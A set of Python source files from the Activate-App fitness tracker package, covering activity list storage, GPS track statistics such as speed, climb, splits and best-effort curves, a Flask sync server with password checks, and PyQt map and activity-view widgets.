LIST_FILENAME = "activity_list.json.gz"
ACTIVITIES_DIR_NAME = "activities"
def from_serial(serial, path):
return ActivityList((UnloadedActivity(**a) for a in serial), path)
def from_disk(path):
"""Load an activity list from disk, if it exists."""
try:
return from_serial(serialise.load(path / LIST_FILENAME), path)
except FileNotFoundError:
return ActivityList([], path)
@dataclasses.dataclass
class UnloadedActivity:
name: str
sport: str
flags: dict
effort_level: Optional[int]
start_time: datetime.datetime
distance: float
duration: float
climb: float
activity_id: str
server: Optional[str] = None
username: Optional[str] = None
def load(self, path) -> activity.Activity:
"""Get the corresponding loaded Activity from disk."""
return activity.Activity(**serialise.load(path / f"{self.activity_id}.json.gz"))
@property
def list_row(self):
result = [
self.name,
self.sport,
self.start_time,
units.DimensionValue(self.distance, "distance"),
]
if self.server is not None:
result = [self.server, self.username] + result
return result
class ActivityList(list):
"""A list of activities, which may be loaded."""
def __init__(self, activities, path=None):
"""Create a list of unloaded activities."""
self._activities = {}
self.path = path
super().__init__(activities)
def by_id(self, activity_id):
try:
return next(a for a in self if a.activity_id == activity_id)
except StopIteration as e:
raise KeyError("No such activity_id") from e
def provide_full_activity(self, activity_id, activity_):
self._activities[activity_id] = activity_
def get_activity(self, activity_id):
"""Get an activity from its activity_id."""
if activity_id not in self._activities:
if self.path is None:
raise ValueError("Cannot load activity")
self.provide_full_activity(
activity_id,
self.by_id(activity_id).load(self.path / ACTIVITIES_DIR_NAME),
)
return self._activities[activity_id]
def serialised(self):
return [dataclasses.asdict(a) for a in self]
def save(self):
"""
Store the activity list in a file.
This only stores the list data, not the actual activities.
"""
serialise.dump(self.serialised(), self.path / LIST_FILENAME, gz=True)
def save_activity(self, activity_id):
self.get_activity(activity_id).save(self.path / ACTIVITIES_DIR_NAME)
def add_activity(self, new_activity):
"""
Add a new activity.
Also saves the activity to disk.
"""
self._activities[new_activity.activity_id] = new_activity
self.append(new_activity.unload(UnloadedActivity))
new_activity.save(self.path / ACTIVITIES_DIR_NAME)
def update(self, activity_id):
"""Regenerate an unloaded activity from its loaded version."""
for i, unloaded_activity in enumerate(self):
if unloaded_activity.activity_id == activity_id:
self[i] = self._activities[activity_id].unload(UnloadedActivity)
break
def remove(self, activity_id):
"""Remove an activity from all parts of the ActivityList."""
# Remove from main list
for a in self:
if a.activity_id == activity_id:
super().remove(a)
# Remove from loaded activities
if activity_id in self._activities:
del self._activities[activity_id]
def filtered(self, activity_types, time_period, now, back=0):
"""
Get an iterable of the matching activities.
The activity types must match activity_types and they must have
taken place in the correct time period. The values for
time_period are "all time", "year", "month" and "week". A value
of zero for back gives this year/month/week, 1 gives the
previous, etc.
"""
time_period = time_period.casefold()
return (
a
for a in self
if a.sport in activity_types
and (
time_period == "all time"
or times.period_difference(now, a.start_time, time_period) == back
)
)
def total_distance(self, activities):
return sum(a.distance for a in activities)
def total_time(self, activities):
return sum((a.duration for a in activities), datetime.timedelta())
def total_activities(self, activities):
return sum(1 for _ in activities)
def total_climb(self, activities):
return sum(a.climb for a in activities if a.climb is not None)
def eddington(self, activities, progress=lambda x: x) -> list:
"""Get a list of days sorted by distance done that day."""
return sorted(
sum(
(
Counter(self.get_activity(a.activity_id).track.distance_in_days)
for a in progress(activities)
),
Counter(),
).values(),
reverse=True,
)
def get_progression_data(self, activity_types, time_period, now, key):
"""
Get the activity dates, along with the total at that point.
Filter out the wrong activity_types. Evaluate key for each
activity, and get (dates, totals) in order.
"""
time_period = time_period.casefold()
if time_period == "all time":
data = ([], [])
total = None
valid_sorted = sorted(
self.filtered(activity_types, time_period, now, 0),
key=lambda x: x.start_time,
)
for a in valid_sorted:
value = key(a)
if value is None:
continue
if total is None:
total = value - value
data[0].append(a.start_time)
data[1].append(total)
total += value
data[0].append(a.start_time + a.duration)
data[1].append(total)
if total is not None:
data[0].append(now)
data[1].append(total)
return (None, [data])
# Other time periods
# This is a bit of a hack: all dates are changed to around 1971
# so that DateTimeAxis can eventually handle them
periods = []
result = []
for back in range(5):
start = times.start_of(times.EPOCH, time_period)
data = ([start], [0])
total = None
valid_sorted = sorted(
self.filtered(activity_types, time_period, now, back),
key=lambda x: x.start_time,
)
if not valid_sorted:
continue
for a in valid_sorted:
value = key(a)
if value is None:
continue
if total is None:
total = value - value
data[0].append(start + times.since_start(a.start_time, time_period))
data[1].append(total)
total += value
data[0].append(
start + times.since_start(a.start_time + a.duration, time_period)
)
data[1].append(total)
if back != 0:
data[0].append(times.end_of(times.EPOCH, time_period))
else:
data[0].append(times.EPOCH + times.since_start(now, time_period))
data[1].append(total)
result.append(data)
periods.append(times.back_name(now, time_period, back))
return (periods[::-1], result[::-1])
def get_records(
self, activity_types, time_period, now, distances, progress=lambda x: x
):
records = {}
activity_ids = {}
for activity_ in progress(self.filtered(activity_types, time_period, now, 0)):
for record in self.get_activity(activity_.activity_id).track.get_curve(
distances
)[0]:
if record[0] not in records or records[record[0]][0] > record[1]:
records[record[0]] = record[1:] + (activity_.name,)
activity_ids[record[0]] = activity_.activity_id
return (
[(distance,) + record for distance, record in records.items()],
activity_ids.values(),
)
def get_all_photos(self, activity_types, time_period, now):
return (
p
for a in self.filtered(activity_types, time_period, now)
for p in self.get_activity(a.activity_id).photos
)
def get_all_routes(self, activity_types, time_period, now, progress=lambda x: x):
result = []
for activity_ in progress(self.filtered(activity_types, time_period, now)):
track = self.get_activity(activity_.activity_id).track
if track.has_position_data:
result.append(track.lat_lon_list)
return result
def get_matching(self, activity_, tolerance, progress=lambda x: x):
matching = {activity_.activity_id}
if not activity_.track.has_position_data:
return matching
for other_activity in progress(self):
if other_activity.activity_id == activity_.activity_id or not (
other_activity.sport == activity_.sport
and other_activity.distance / 1.2
< activity_.distance
< other_activity.distance * 1.2
):
continue
if activity_.track.match(
self.get_activity(other_activity.activity_id).track, tolerance
):
matching.add(other_activity.activity_id)
return matching
def __repr__(self):
return (
f"<{self.__class__.__qualname__}"
f" {super().__repr__()}"
f" _activities={self._activities!r}>"
) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/activity_list.py | activity_list.py |
import math
from contextlib import suppress
from dataclasses import asdict, dataclass
from datetime import datetime, timedelta
from functools import lru_cache
from itertools import tee
import bisect
from dtw import dtw
from activate import geometry, times
from activate.units import DimensionValue
SPEED_RANGE = 1
FIELD_DIMENSIONS = {
"lat": "latlon",
"lon": "latlon",
"ele": "altitude",
"height_change": "altitude",
"vertical_speed": "vertical_speed",
"climb": "altitude",
"desc": "altitude",
"gradient": None,
"angle": "angle",
"time": "time",
"speed": "speed",
"dist": "distance",
"dist_to_last": "distance",
"cadence": "cadence",
"heartrate": "heartrate",
"power": "power",
}
NON_SAVED = {"vertical_speed", "climb", "desc", "gradient", "angle"}
def lerp(value1, value2, ratio):
"""
Interpolate between value1 and value2.
lerp(x, y, 0) = x
lerp(x, y, 0.5) = (x + y) / 2
lerp(x, y, 1) = y
"""
return value1 + ratio * (value2 - value1)
def pairs(iterator):
"""Return pairs of adjacent items."""
firsts, seconds = tee(iterator, 2)
next(seconds)
return zip(firsts, seconds)
def infer_nones(data):
"""Infer None values by linear interpolation."""
none_count = 0
last_good = None
for index, value in enumerate(data):
if value is None:
none_count += 1
continue
if none_count:
# Write back interpolated values
gap_size = none_count + 1
for write_back in range(1, gap_size):
# Nones at start
if last_good is None:
data[index - write_back] = value
# Nones in middle
else:
data[index - write_back] = lerp(
value, last_good, write_back / gap_size
)
none_count = 0
last_good = value
if not none_count:
return data
# Nones at end
if last_good is None:
raise ValueError("Cannot interpolate from all Nones")
for write_back in range(none_count + 1):
data[index - write_back] = last_good
return data
def get_nearby_indices(length, position, number=1) -> range:
"""
Return numbers around position, with at most number either side.
If position is too close to 0 or length, the excess points are
removed.
"""
return range(max(position - number, 0), min(position + number + 1, length))
try:
from math import dist
except ImportError:
def dist(point1, point2):
return math.sqrt(sum((c1 - c2) ** 2 for c1, c2 in zip(point1, point2)))
def enumerate_from(list_, point):
return enumerate(list_[point:], point)
@dataclass
class ManualTrack:
"""A manual track with a few basic values."""
start_time: datetime
length: float
ascent: float
elapsed_time: timedelta
has_altitude_data = False
has_position_data = False
manual = True
def average(self, field):
if field == "speed":
return self.length / self.elapsed_time.total_seconds()
raise AttributeError(f"{self.__class__.__qualname__} has no average {field}")
@property
def save_data(self):
result = asdict(self)
result["manual"] = True
return result
def __contains__(self, _):
return False
class Track:
"""
A series of GPS points at given times.
A track is considered to be purely a sequence of GPS points, with
extra data for each point. For more metadata such as a name or
description, the Track should be wrapped in an Activity.
Some tracks (those representing pool swims) have no position data.
"""
manual = False
def __init__(self, fields):
self.fields = fields
for essential in ("lat", "lon"):
if essential in self.fields:
with suppress(ValueError):
infer_nones(self[essential])
if "time" in self.fields:
infer_nones(self["time"])
self["ele"] = (
infer_nones(self["ele"])
if self.has_altitude_data
else [0 for _ in range(len(self))]
)
def __getitem__(self, field):
try:
return self.fields[field]
except KeyError:
if field == "dist_to_last":
self.calculate_dist_to_last()
elif field == "dist":
self.calculate_dist()
elif field == "speed":
self.calculate_speed()
elif field in {"climb", "desc"}:
self.calculate_climb_desc()
elif field == "height_change":
self.calculate_height_change()
elif field == "vertical_speed":
self.calculate_vertical_speed()
elif field == "gradient":
self.calculate_gradient()
elif field == "angle":
self.calculate_angle()
return self.fields[field]
def __setitem__(self, field, value):
self.fields[field] = value
def __contains__(self, field):
if field in {"dist_to_last", "dist"}:
return "dist" in self or "dist_to_last" in self or self.has_position_data
if field in {
"climb",
"desc",
"height_change",
"vertical_speed",
"gradient",
"angle",
}:
return self.has_altitude_data
return field in self.fields
@property
@lru_cache(128)
def temporal_resolution(self):
return min(y - x for x, y in pairs(self["time"])).total_seconds()
@property
@lru_cache(128)
def xyz(self):
return [
geometry.to_cartesian(*point)
for point in zip(self["lat"], self["lon"], self["ele"])
]
def calculate_dist_to_last(self):
"""Calculate distances between adjacent points."""
self.fields["dist_to_last"] = [None]
if "dist" in self.fields:
for point in range(1, len(self)):
relevant = self.fields["dist"][point - 1 : point + 1]
self.fields["dist_to_last"].append(
None if None in relevant else relevant[1] - relevant[0]
)
else:
self.fields["dist_to_last"] += [dist(*x) for x in pairs(self.xyz)]
def calculate_climb_desc(self):
self.fields["climb"] = [None]
self.fields["desc"] = [None]
for height_change in self["height_change"][1:]:
# Not using max in order to have integers instead of floats,
# since max(0, 0.0) is 0.0. It's common to have a height
# difference of 0.0 in tracks, because altimeters are not
# very sensitive.
self.fields["climb"].append(0 if height_change <= 0 else height_change)
self.fields["desc"].append(0 if height_change >= 0 else -height_change)
def calculate_dist(self):
"""Calculate cumulative distances."""
total_dist = 0
new_dist = [0]
for dist in self["dist_to_last"][1:]:
total_dist += dist
new_dist.append(total_dist)
self.fields["dist"] = new_dist
def calculate_speed(self):
"""Calculate speeds at each point."""
speeds = []
for point_index in range(len(self)):
relevant_points = get_nearby_indices(
len(self), point_index, number=SPEED_RANGE
)
time_diff = (
self["time"][relevant_points[-1]] - self["time"][relevant_points[0]]
).total_seconds()
distance = sum(
self["dist_to_last"][p]
for p in relevant_points[1:]
if self["dist_to_last"][p] is not None
)
if time_diff:
speeds.append(distance / time_diff)
elif speeds:
speeds.append(speeds[-1])
else:
speeds.append(0)
self["speed"] = speeds
def calculate_height_change(self):
"""Calculate differences in elevation between adjacent points."""
self.fields["height_change"] = [None] + [y - x for x, y in pairs(self["ele"])]
def calculate_vertical_speed(self):
"""Calculate vertical speed at each point."""
self.fields["vertical_speed"] = [None]
for point in range(1, len(self)):
height_change = self["height_change"][point]
time = self["time"][point]
last_time = self["time"][point - 1]
if None in {height_change, time, last_time}:
self.fields["vertical_speed"].append(None)
else:
self.fields["vertical_speed"].append(
height_change / (time - last_time).total_seconds()
)
def calculate_gradient(self):
"""Calculate the gradient at each point."""
self.fields["gradient"] = [None]
for dist, height_change in list(
zip(self["dist_to_last"], self["height_change"])
)[1:]:
self.fields["gradient"].append(
None if dist in {None, 0} else height_change / dist
)
def calculate_angle(self):
"""Calculate the angle of inclination at each point."""
self.fields["angle"] = [
None if g is None else math.atan(g) for g in self["gradient"]
]
def __len__(self):
return len(next(iter(self.fields.values())))
@lru_cache(128)
def without_nones(self, field):
return [v for v in self[field] if v is not None]
@lru_cache(128)
def average(self, field):
"""Get the mean value of a field, ignoring missing values."""
if field == "speed":
return self.length / self.elapsed_time.total_seconds()
valid = list(self.without_nones(field))
return sum(valid) / len(valid)
@lru_cache(128)
def maximum(self, field):
"""Get the maximum value of a field, ignoring missing values."""
return max(self.without_nones(field))
# Caching necessary to avoid fake elevation data
@property
@lru_cache(128)
def has_altitude_data(self):
return "ele" in self.fields
@property
@lru_cache(128)
def has_position_data(self):
return "lat" in self.fields and "lon" in self.fields
@property
@lru_cache(128)
def lat_lon_list(self):
return [[x, y] for x, y in zip(self["lat"], self["lon"])]
def part_lat_lon_list(self, min_dist, max_dist):
track = []
for dist, lat, lon in zip(self["dist"], self["lat"], self["lon"]):
if dist is None or dist < min_dist:
continue
if dist >= max_dist:
return track
track.append([lat, lon])
return track
@property
@lru_cache(128)
def ascent(self):
if self.has_altitude_data:
return sum(self.without_nones("climb"))
@property
@lru_cache(128)
def descent(self):
if self.has_altitude_data:
return sum(self.without_nones("desc"))
@property
def start_time(self):
return self["time"][0]
@property
@lru_cache(128)
def elapsed_time(self) -> timedelta:
end_time = self["time"][-1]
return end_time - self.start_time
@property
@lru_cache(128)
def moving_time(self) -> timedelta:
total_time = timedelta(0)
last_distance = 0
last_time = self.start_time
for distance, time in zip(self["dist"][1:], self["time"][1:]):
if distance is None:
continue
time_difference = time - last_time
if not time_difference:
continue
distance_difference = distance - last_distance
if distance_difference < 1:
continue
if distance_difference / time_difference.total_seconds() > 0.2:
total_time += time_difference
elif distance < last_distance:
raise ValueError("Distance increase")
last_distance = distance
last_time = time
return total_time
@property
@lru_cache(128)
def average_speed_moving(self):
return self.length / self.moving_time.total_seconds()
@property
@lru_cache(128)
def distance_in_days(self) -> dict:
if self.start_time.date() == self["time"][-1].date():
return {self.start_time.date(): self.length}
last_time = self.start_time
last_date = last_time.date()
totals = {last_date: 0}
for dist_to_last, time in zip(self["dist_to_last"][1:], self["time"][1:]):
if dist_to_last is None:
continue
date = time.date()
if date == last_date:
totals[last_date] += dist_to_last
else:
speed = dist_to_last / (time - last_time).total_seconds()
totals[last_date] += (
speed * (times.end_of(last_time, "day") - last_time).total_seconds()
)
for days in range(1, (date - last_date).days):
day = last_date + timedelta(days)
totals[day] = speed * timedelta(days=1)
totals[date] = (
speed * (time - times.start_of(time, "day")).total_seconds()
)
last_date = date
last_time = time
return totals
def lat_lng_from_distance(self, distance):
distances = self.without_nones("dist")
point0 = bisect.bisect(distances, distance)
try:
point1 = next(
i for i, d in enumerate_from(distances, point0) if d > distance
)
except StopIteration:
return None
point0 -= 1
dist0 = distances[point0]
dist1 = distances[point1]
lat0 = self["lat"][point0]
lon0 = self["lon"][point0]
if dist0 == dist1:
return (lat0, lon0)
lat1 = self["lat"][point1]
lon1 = self["lon"][point1]
ratio = (distance - dist0) / (dist1 - dist0)
return (lerp(lat0, lat1, ratio), lerp(lon0, lon1, ratio))
def graph(self, y_data, x_data="dist") -> tuple:
"""Get x and y data as (data, dimension) tuples."""
return (
(self[x_data], FIELD_DIMENSIONS[x_data]),
(self[y_data], FIELD_DIMENSIONS[y_data]),
)
@property
def length(self):
return next(x for x in reversed(self["dist"]) if x is not None)
def splits(self, splitlength=1000) -> list:
"""
Split an activity into splits, with per-split data.
Each split is a list in the format
[lap, split, speed, net climb, total climb].
"""
splits = []
lasttime = None
lastalt = None
total_climb = 0
for time, distance, alt, climb in zip(
self["time"], self["dist"], self["ele"], self["climb"]
):
if lasttime is None:
lasttime = time
lastalt = alt
if distance is None:
continue
if distance // splitlength > len(splits):
speed = splitlength / (time - lasttime).total_seconds()
splits.append(
[
DimensionValue(time - lasttime, "time"),
DimensionValue(time - self.start_time, "time"),
DimensionValue(speed, "speed"),
DimensionValue(alt - lastalt, "altitude"),
DimensionValue(total_climb, "altitude"),
]
)
total_climb = 0
lasttime = None
if climb is not None:
total_climb += climb
return splits
def get_zone_durations(self, zones, field="speed", count_field="time"):
"""
Get durations for the zones graph.
Between all zones values, calculate the total amount of
count_field at each point where field is within the range given
by that pair of zones values. The zones must be sorted in
ascending order.
"""
buckets = {z: 0 for z in zones}
for point in range(len(self)):
# Work out the amount of count_field at the point
nearby_points = get_nearby_indices(len(self), point)
duration = (
self[count_field][nearby_points[-1]]
- self[count_field][nearby_points[0]]
) / 2
duration = times.to_number(duration)
# Add it to the correct bucket
value = self[field][point]
if value is None:
continue
for zone in zones[::-1]:
if value > zone:
buckets[zone] += duration
break
return buckets
def get_curve(self, table_distances):
"""Get the curve and curve table for an activity."""
table_distances = [x for x in table_distances if x <= self.length][::-1]
time_values = [t.timestamp() for t in self["time"]]
bests = []
point_indices = []
for distance in table_distances:
last_point = next(
i for i, d in enumerate(self["dist"]) if d is not None and d > distance
)
best = time_values[last_point] - self.start_time.timestamp()
first_point = 0
point = (first_point, last_point)
for last_point, last_dist in enumerate_from(self["dist"], last_point + 1):
if last_dist is None:
continue
last_good_first_point = first_point
for first_point, first_dist in enumerate_from(
self["dist"], first_point
):
if first_dist is None:
continue
if last_dist - first_dist >= distance:
last_good_first_point = first_point
else:
break
first_point = last_good_first_point
time_taken = time_values[last_point] - time_values[first_point]
if time_taken < best:
best = time_taken
point = (first_point, last_point)
bests.append(best)
point_indices.append(point)
if best == self.temporal_resolution:
break
while len(point_indices) < len(table_distances):
point_indices.append(point_indices[-1])
bests.append(bests[-1])
point_indices = point_indices[::-1]
bests = bests[::-1]
table_distances = table_distances[::-1]
speeds = [
distance / time if time else 0
for distance, time in zip(table_distances, bests)
]
bests_table = [
(
DimensionValue(distance, "distance"),
DimensionValue(timedelta(seconds=time), "time"),
DimensionValue(speed, "speed"),
)
for distance, time, speed in zip(table_distances, bests, speeds)
]
return (
bests_table,
((table_distances, "distance"), (speeds, "speed")),
point_indices,
)
def match(self, other, tolerance=40):
return (
dtw(self.xyz, other.xyz, distance_only=True).normalizedDistance < tolerance
)
def max_point(self, stat):
point = None
maximum = float("-inf")
for index, value in enumerate(self[stat]):
if value is not None and value > maximum:
maximum = value
point = index
return point
@property
def save_data(self):
return {
key: value for key, value in self.fields.items() if key not in NON_SAVED
} | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/track.py | track.py |
import hashlib
import json
import sqlite3
from base64 import b64decode, b64encode
from datetime import timedelta
from functools import wraps
from pathlib import Path
from uuid import UUID
import pkg_resources
from flask import Flask, abort, g, request
from activate import activity, serialise
DATA_DIR = Path("/var/lib/activate")
USERS_FILE = DATA_DIR / "users.json"
app = Flask(__name__)
ACTIVITIES_DIR = DATA_DIR / "activities"
ACTIVITIES_DIR.mkdir(parents=True, exist_ok=True)
ACTIVITIES_DATABASE_PATH = DATA_DIR / "activities.sqlite"
sqlite3.register_converter("DICT", serialise.loads)
sqlite3.register_adapter(dict, serialise.dumps)
sqlite3.register_converter(
"TIMEDELTA", lambda d: timedelta(seconds=float(d) if b"." in d else int(d))
)
sqlite3.register_adapter(timedelta, lambda d: d.total_seconds())
sqlite3.register_converter("UUID", lambda u: UUID(u.decode("utf-8")))
sqlite3.register_adapter(UUID, str)
def add_row(database, table: str, values: dict):
"""Add a row to an SQLite database."""
database.execute(
f"INSERT INTO {table} ({', '.join(values)})"
f" VALUES ({', '.join(f':{v}' for v in values)})",
values,
)
def get_row(database, table: str, values: dict):
"""Find a row in an SQLite database."""
return database.execute(
f"SELECT * FROM {table} WHERE {' AND '.join(f'{v} = :{v}' for v in values)}",
values,
).fetchone()
def delete_by_id(activities, activity_id):
"""Delete a row with a given activity_id."""
activities.execute(
"DELETE FROM activities WHERE activity_id = ?", [str(activity_id)]
)
def reset_activities():
"""Generate a blank activities database."""
db = load_database()
db.executescript(
pkg_resources.resource_string("activate.resources", "init.sql").decode("utf-8")
)
db.commit()
def load_database():
db = sqlite3.connect(
ACTIVITIES_DATABASE_PATH,
detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES,
)
db.row_factory = sqlite3.Row
return db
def get_activities():
if "db" not in g:
g.db = load_database()
return g.db
@app.teardown_appcontext
def close_activities(e=None):
db = g.pop("db", None)
if db is not None:
db.close()
def get_users():
try:
with open(USERS_FILE) as f:
return json.load(f)
except FileNotFoundError:
return {}
def save_users():
with open(USERS_FILE, "w") as f:
json.dump(f, users)
def password_hash(password: str, salt):
return b64encode(
hashlib.scrypt(
password.encode("utf-8"), salt=b64decode(salt), n=16384, r=8, p=1
)
).decode("utf-8")
def verify_request():
"""Check username and password against the database."""
if request.authorization is None:
return False
username = request.authorization["username"]
if username not in users:
return False
password = request.authorization["password"]
return (
password_hash(password, users[username]["salt"])
== users[username]["password_hash"]
)
def requires_auth(function):
@wraps(function)
def new_function(*args, **kwargs):
if not verify_request():
abort(403)
return function(*args, **kwargs)
return new_function
@app.route("/")
def index():
return "This is an Activate server."
@app.route("/api/send_activity", methods=["POST"])
@requires_auth
def upload():
data = serialise.loads(request.form["activity"])
data["username"] = request.authorization["username"]
new_activity = activity.Activity(**data)
activities = get_activities()
delete_by_id(activities, new_activity.activity_id)
add_row(
activities,
"activities",
{
"name": new_activity.name,
"sport": new_activity.sport,
"flags": new_activity.flags,
"effort_level": new_activity.effort_level,
"start_time": new_activity.start_time,
"distance": new_activity.distance,
"duration": new_activity.track.elapsed_time,
"climb": new_activity.track.ascent,
"activity_id": new_activity.activity_id,
"username": new_activity.username,
},
)
new_activity.save(ACTIVITIES_DIR)
activities.commit()
return "DONE"
@app.route("/api/delete_activity/<string:activity_id>")
@requires_auth
def delete_activity(activity_id):
activity_id = UUID(activity_id)
activities = get_activities()
row = get_row(activities, "activities", {"activity_id": activity_id})
if row["username"] != request.authorization["username"]:
abort(403)
delete_by_id(activities, activity_id)
activities.commit()
return "DONE"
@app.route("/api/get_activities")
@requires_auth
def get_list():
activities = get_activities()
activities = activities.execute("SELECT * FROM activities").fetchall()
return serialise.dump_bytes([{k: a[k] for k in a.keys()} for a in activities])
@app.route("/api/get_activity/<string:activity_id>")
@requires_auth
def get_activity(activity_id):
activity_id = UUID(activity_id)
activities = get_activities()
try:
get_row(activities, "activities", {"activity_id": activity_id})
except FileNotFoundError:
abort(404)
with open(ACTIVITIES_DIR / f"{activity_id}.json.gz", "rb") as f:
return f.read()
users = get_users()
if not ACTIVITIES_DATABASE_PATH.exists():
reset_activities() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/server/__init__.py | __init__.py |
from contextlib import suppress
from PyQt5 import QtWidgets
import pyqtlet
from PyQt5.QtCore import Qt
from pyqtlet import L
def get_bounds(*routes):
"""Find the area of the map."""
return [
[min(p[0] for r in routes for p in r), min(p[1] for r in routes for p in r)],
[max(p[0] for r in routes for p in r), max(p[1] for r in routes for p in r)],
]
DEFAULT_POS = [53, -1]
ACTIVATE_COLOUR = "#802090"
def js_string(obj):
if obj is None:
return "null"
if isinstance(obj, bool):
return "true" if obj else "false"
if isinstance(obj, (list, tuple, set)):
return f"[{','.join(js_string(i) for i in obj)}]"
if isinstance(obj, dict):
return (
"{"
f"{','.join(f'{js_string(k)}:{js_string(v)}' for k, v in obj.items())}"
"}"
)
return repr(obj)
class Js:
def __init__(self, obj):
self.obj = obj
def __getattr__(self, name):
def method(*args):
self.obj.runJavaScript(
f"{self.obj.jsName}.{name}({','.join(js_string(x) for x in args)});"
)
return method
class Polyline(L.polyline):
def setLatLngs(self, coordinates):
Js(self).setLatLngs(coordinates)
class CircleMarker(L.circleMarker):
def setLatLng(self, coordinates):
Js(self).setLatLng(coordinates)
class Map(pyqtlet.MapWidget):
def __init__(self, parent, settings):
super().__init__()
self._page.profile().setHttpUserAgent("Activate")
self.settings = settings
size_policy = self.sizePolicy()
size_policy.setRetainSizeWhenHidden(True)
self.setSizePolicy(size_policy)
self.setContextMenuPolicy(Qt.NoContextMenu)
self.map = L.map(self)
if settings.tiles is None:
L.tileLayer(
"http://{s}.tile.osm.org/{z}/{x}/{y}.png",
{"attribution": "© OpenStreetMap contributors"},
).addTo(self.map)
else:
L.tileLayer(settings.tiles, {"attribution": ""}).addTo(self.map)
self.map.runJavaScript(f"{self.map.jsName}.attributionControl.setPrefix('');")
self.moved = False
def fit_bounds(self, bounds):
if self.moved:
Js(self.map).flyToBounds(
bounds,
{"duration": self.settings.map_speed}
if self.settings.map_speed > 0
else {},
)
else:
Js(self.map).fitBounds(bounds)
self.moved = True
class MapWidget(Map):
"""A map for displaying a route or heatmap."""
def __init__(self, parent, tiles):
super().__init__(parent, tiles)
self.route_lines = []
self.start_icon = CircleMarker(DEFAULT_POS, {"radius": 8, "color": "#10b020"})
self.finish_icon = CircleMarker(DEFAULT_POS, {"radius": 8, "color": "#e00000"})
self.marker = CircleMarker(DEFAULT_POS, {"radius": 5, "color": ACTIVATE_COLOUR})
self.highlight_section = self.add_route_line(self.highlight_colour)
self.mode = None
def resizeEvent(self, event):
super().resizeEvent(event)
QtWidgets.qApp.processEvents()
with suppress(AttributeError):
self.fit_bounds(self.bounds)
def show_route(self, route: list):
"""Display a list of points on the map."""
self.bounds = get_bounds(route)
self.fit_bounds(self.bounds)
if self.mode != "route":
self.clear_route_lines()
self.route_lines = [self.add_route_line()]
self.route_lines[0].setLatLngs(route)
self.start_icon.setLatLng(route[0])
self.finish_icon.setLatLng(route[-1])
self.start_icon.addTo(self.map)
self.finish_icon.addTo(self.map)
self.mode = "route"
def show_heatmap(self, routes: list):
"""Display lists of points on the map as a heatmap."""
if not routes:
return
colour = ACTIVATE_COLOUR + hex(min(round(1000 / (len(routes) ** 0.5)), 255))[2:]
self.bounds = get_bounds(*routes)
self.fit_bounds(self.bounds)
self.start_icon.removeFrom(self.map)
self.finish_icon.removeFrom(self.map)
self.clear_route_lines()
self.route_lines = []
for route in routes:
self.route_lines.append(self.add_route_line(colour))
self.route_lines[-1].setLatLngs(route)
self.mode = "heatmap"
def add_route_line(self, colour=ACTIVATE_COLOUR):
line = Polyline([], {"smoothFactor": 0, "color": colour})
line.addTo(self.map)
return line
def clear_route_lines(self):
while self.route_lines:
self.route_lines.pop().removeFrom(self.map)
def show_marker(self, position):
if position is None:
self.remove_marker()
return
self.marker.setLatLng(list(position))
self.marker.addTo(self.map)
def remove_marker(self):
self.marker.removeFrom(self.map)
def show_highlight(self, part):
self.highlight_section.setLatLngs(part)
self.highlight_section.addTo(self.map)
Js(self.highlight_section).bringToFront
def remove_highlight(self):
self.highlight_section.removeFrom(self.map)
@property
def highlight_colour(self):
return self.palette().color(self.palette().Highlight).name() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/maps.py | maps.py |
import markdown
from PyQt5 import QtWidgets
from PyQt5.QtCore import pyqtSignal
from activate import activity_types, times
from activate.app import charts, photos
from activate.app.ui.activity_view import Ui_activity_view
class ActivityView(QtWidgets.QWidget, Ui_activity_view):
"""The statistics, graphs and map showing an activity."""
closed = pyqtSignal()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
def setup(self, unit_system, map_widget):
self.unit_system = unit_system
self.updated = set()
self.map_widget = map_widget
self.photo_list = photos.PhotoList(self)
self.overview_tab_layout.addWidget(self.photo_list)
for table in (self.split_table, self.info_table, self.curve_table):
table.set_units(self.unit_system)
table.setMouseTracking(True)
self.info_table.cellEntered.connect(self.show_stat_point)
self.split_table.cellEntered.connect(self.show_split)
self.curve_table.cellEntered.connect(self.show_fastest)
# Set up charts
self.charts = charts.LineChartSet(self.unit_system, self.graphs_layout)
self.charts.add("ele", area=True)
self.charts.add("speed")
self.charts.add("heartrate")
self.charts.add("cadence")
self.charts.add("power")
for chart in self.charts.charts.values():
chart.widget.mouse_moved.connect(self.show_marker)
self.zones_chart = charts.Histogram([0], self.zones_graph, self.unit_system)
self.curve_chart = charts.LineChart(
self.curve_graph,
self.unit_system,
area=True,
vertical_ticks=12,
horizontal_log=True,
)
def update_splits(self, data):
"""Update the activity splits page."""
self.split_table.update_data(data)
def switch_to_summary(self):
"""Update labels, map and data box."""
self.activity_name_label.setText(self.activity.name)
self.flags_label.setText(" | ".join(self.activity.active_flags))
self.description_label.setText(markdown.markdown(self.activity.description))
self.date_time_label.setText(times.nice(self.activity.start_time))
self.activity_type_label.setText(self.activity.sport)
self.info_table.update_data(self.activity.stats)
if self.activity.track.has_position_data:
self.map_widget.setVisible(True)
self.map_widget.show_route(self.activity.track.lat_lon_list)
self.show_map()
else:
self.map_widget.setVisible(False)
self.photo_list.show_activity_photos(self.activity)
def switch_to_data(self):
"""Update charts."""
if self.activity.track.has_altitude_data:
self.charts.update_show("ele", [self.activity.track.graph("ele")])
else:
self.charts.hide("ele")
self.charts.update_show("speed", [self.activity.track.graph("speed")])
if "heartrate" in self.activity.track:
self.charts.update_show(
"heartrate", [self.activity.track.graph("heartrate")]
)
else:
self.charts.hide("heartrate")
if "cadence" in self.activity.track:
self.charts.update_show("cadence", [self.activity.track.graph("cadence")])
else:
self.charts.hide("cadence")
if "power" in self.activity.track:
self.charts.update_show("power", [self.activity.track.graph("power")])
else:
self.charts.hide("power")
def switch_to_splits(self):
self.update_splits(
self.activity.track.splits(
splitlength=self.unit_system.units["distance"].size
)
)
def switch_to_zones(self):
zones = (
activity_types.ZONES[self.activity.sport]
if self.activity.sport in activity_types.ZONES
else activity_types.ZONES[None]
)
zones = [self.unit_system.decode(x, "speed") for x in zones]
self.zones_chart.set_zones(zones)
self.zones_chart.update(self.activity.track.get_zone_durations(zones))
@property
def good_distances(self):
return (
activity_types.SPECIAL_DISTANCES[self.activity.sport]
if self.activity.sport in activity_types.SPECIAL_DISTANCES
else activity_types.SPECIAL_DISTANCES[None]
)
